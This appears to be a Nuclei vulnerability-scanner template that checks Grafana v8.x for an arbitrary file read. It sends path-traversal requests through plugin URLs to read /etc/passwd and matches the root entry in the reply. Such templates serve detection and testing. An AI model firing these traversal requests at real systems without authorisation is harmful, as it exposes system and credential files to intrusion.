id: grafana-file-read

info:
  name: Grafana v8.x Arbitrary File Read
  author: z0ne,dhiyaneshDk,jeya.seelan,dwisiswant0
  severity: high
  reference:
    - https://nosec.org/home/detail/4914.html
    - https://github.com/jas502n/Grafana-VulnTips
    - hhttps://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
    - https://twitter.com/naglinagli/status/1468155313182416899
  tags: grafana,lfi,fuzz

requests:
  - method: GET
    path:
      - "{{BaseURL}}/public/plugins/{{pluginSlug}}/../../../../../../../../../../../../../../../../../../../etc/passwd"

    payloads:
      pluginSlug: helpers/wordlists/grafana-plugins.txt

    threads: 50
    stop-at-first-match: true
    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:.*:0:0"

      - type: status
        status:
          - 200